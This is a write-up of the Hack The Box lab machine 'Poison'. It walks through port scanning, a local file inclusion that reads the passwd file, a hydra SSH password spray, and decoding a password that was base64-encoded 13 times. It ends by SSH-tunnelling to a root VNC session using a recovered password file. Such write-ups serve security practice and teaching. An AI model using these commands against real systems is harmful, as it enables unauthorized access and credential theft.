Posion HTB

IP

10.10.10.84

initial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.84 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

22,80

Letts run a more in-depth scan of these ports

sudo nmap -sCV -p22,80 10.10.10.84 -oA nmap_results

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

form what we can see

• we are dealing with a FreeBSD machine

• we have a web server running Apache 2.4.29 utilising PHP 5.6.32

Okay Lets start at the web server

HTTP port 80

Looks like some kind of application where can can run local php scripts on the target machine

Lets start directory busting in the background and enumerate this further

feroxbuster -u http://10.10.10.84 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs.txt

• Not much luck with our dir busting

Playing around with the application we can view te info.php which gives us the exact version of FreeBSD running on the target

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE

Notice in the url we could have a potential LFI

Lets catch the request with burp and further test this

ctach the request and send it over to repeater

if we look at the following

meaning we need to go up 5 directories

we have the contents of the passwd file Lets gather some usernames

charix
cups
avahi

• these seem like the only possible user accounts other then root

While we enumerate the LFI lets beginning a SSH password spray attack with these usernames

hydra -f -P /usr/share/wordlists/rockyou.txt -L usernames 10.10.10.84 ssh

When we specify through the web application we want to open the file listfiles.php we can see a file names pwdbackup.txt

Lets see if we can open this file

when we look at it we can see the following

im assuming they mean they encoded the password 13 times using base64

Lets decode it

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

we can write a quick bash script to take the encoded string and specified number of times to decode it

#!/bin/bash

# Get the Base64 string and number of times to decode
base64_string="$1"
num_times="$2"

# Decode the Base64 string the specified number of times
for ((i=0; i<num_times; i++)); do
    decoded_string=$(echo "$base64_string" | base64 --decode)
    base64_string="$decoded_string"
done

# Print the final decoded string
echo "Final Decoded String: $decoded_string"

when we run the script we can see the following

bash basedecode.sh Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo= 13

we have the password Charix!2#4%6&8(0

Lets top our hydra attack and specify this password and see if we can gain SSH access to the machine

hydra -f -P passwd -L usernames 10.10.10.84 ssh

we can see we have a hit

Lets SSH into the machine

ssh charix@10.10.10.84

Priv Esc via charix

Looking through charix home folder we do find a secret.zip file

Its protected with a password

Letys download this zip file to our local machine

scp charix@10.10.10.84:/home/charix/secret.zip ./

Lets try the password we found for charix

• it worked

unzip secret.zip

it produces a file named secret

we use hexdump to see the file contents

cat secret| hexdump -c
0000000 275 250   [   | 325 226   z   !                                
0000008

• What is this binary for?

Lets confirm the version of FreeBSD we are on

freebsd-version -k

• 11.1-RELEASE

Givin the name of the machine and the version we can search for possible exploit using searchsploit

searchsploit freebsd poison

we find one interesting

• Possible vector will look more into it later

Lets see if there is any ports open internally on the target

netstat -an -p tcp

We can see the following two ports 5801, 5901 which are related to VNC, for remote desktop access

• Worth investigating further

Let's see if there are any processes running related to VNC

ps aux | grep vnc

this is interesting Lets explain what happening

-desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901

• Desktop Name: -desktop X

• HTTP Classes Location: -httpd /usr/local/share/tightvnc/classes

• X Authentication Data File: -auth /root/.Xauthority

• Screen Geometry: -geometry 1280x800

• Color Depth: -depth 24

• VNC Server Wait Time: -rfbwait 120000 (120,000 milliseconds)

• VNC Authentication Password File: -rfbauth /root/.vnc/passwd

• VNC Server Port: -rfbport 5901 (default VNC port)

With this information

• it would make sense for the random binary file secret to be the authentication we need to authenticate to vnc

• we can tunnel our command to vnc utilzing SSH

• We can authenticate to port 5901 and hopefully gain access to the remote desktop X

Okay lets do it

1. Lets create a Link using SSH from our local machine and our target

ssh -L 9001:127.0.0.1:5901 charix@10.10.10.84

• -L : creates a link to our local machine tp the target machine

• 9001: the first port we specify is our local port

• 127.0.0.1:5901: local ip and the target port (the vnc port)

1. Now we can utilize vncviewer utilizing the secret file we found earlier as our password file to be passed through and connect to the remote desktop

vncviewer -passwd secret 127.0.0.1::9001

we now have access to desktop root's X desktop as the root user